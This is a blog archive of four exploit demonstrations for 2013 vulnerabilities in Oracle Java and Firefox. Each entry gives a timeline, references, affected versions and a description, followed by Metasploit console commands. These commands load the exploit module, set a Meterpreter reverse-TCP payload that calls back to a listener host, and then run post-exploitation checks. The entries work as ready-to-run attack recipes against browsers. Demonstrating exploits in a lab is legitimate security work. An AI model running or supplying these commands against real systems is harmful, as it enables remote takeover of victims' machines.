Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2013-1493 Java CMM Remote Code Execution

Timeline :

Discovered being exploited in the wild in 2013-02
Metasploit PoC provided on 2013-03-26
Patched by the vendor on 2013-04-16

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2013-1493
OSVDB-90737
BID-58238
Oracle Security Alert for CVE-2013-1493

Affected version(s) :

Oracle Java SE 7 Update 15 and before
Oracle Java SE 6 Update 41 and before

Tested on :

Windows 7 SP1 with Java SE 7 Update 15

Description :

This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox, as exploited in the wild in February and March of 2013. The vulnerability affects Java versions 7u15 and earlier and 6u41 and earlier, and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn't bypass click-to-play, so the user must accept the Java warning in order to run the malicious applet.

Commands :

use exploit/windows/browser/java_cmm
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-0753 Firefox XMLSerializer Use After Free

Timeline :

Vulnerability discovered and reported to ZDI by regenrecht
Vulnerability reported to the vendor by ZDI on 2012-11-21
Vulnerability corrected by the vendor on 2013-01-08
Metasploit PoC provided on 2013-08-23

PoC provided by :

regenrecht
juan vazquez

Reference(s) :

CVE-2013-0753
OSVDB-89021
BID-57209
ZDI-13-006
MFSA-2013-16

Affected version(s) :

All versions of Mozilla Firefox prior to 17.0.2

Tested on :

Firefox 17.0.1 on Windows XP SP3

Description :

This module exploits a vulnerability found in Firefox 17.0 (< 17.0.2), specifically a use-after-free of an Element object when using the serializeToStream method with a specially crafted OutputStream that defines its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_firefox_xmlserializer
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to Packet Storm by Name Withheld
Vulnerability corrected by the vendor on 2013-06-18
PoC provided by Packet Storm on 2013-08-12
Metasploit PoC provided on 2013-08-19

PoC provided by :

Name Withheld
sinn3r
juan vazquez

Reference(s) :

CVE-2013-2465
OSVDB-96269
Packet Storm Exploit 2013-0811-1
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before
Oracle Java SE 6 Update 45 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses an invalid array indexing vulnerability in the static storeImageArray() function in order to cause a memory corruption and escape the Java sandbox. The vulnerability affects Java version 7u21 and earlier. The module, which doesn't bypass click-to-play, has been tested successfully on Java 7u21 on Windows and Linux systems.

Commands :

use exploit/multi/browser/java_storeimagearray
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Adam Gowdiak on 2013-04-22 (Issue 61)
Vulnerability corrected by the vendor on 2013-06-18
Metasploit PoC provided on 2013-06-24
PoC provided by Adam Gowdiak on 2013-07-18

PoC provided by :

Adam Gowdiak
Matthias Kaiser

Reference(s) :

CVE-2013-2460
OSVDB-94346
SE-2012-01-ORACLE-12
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses the insecure invoke() method of the ProviderSkeleton class, which allows calling arbitrary static methods with user-supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Commands :

use exploit/multi/browser/java_jre17_provider_skeleton
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid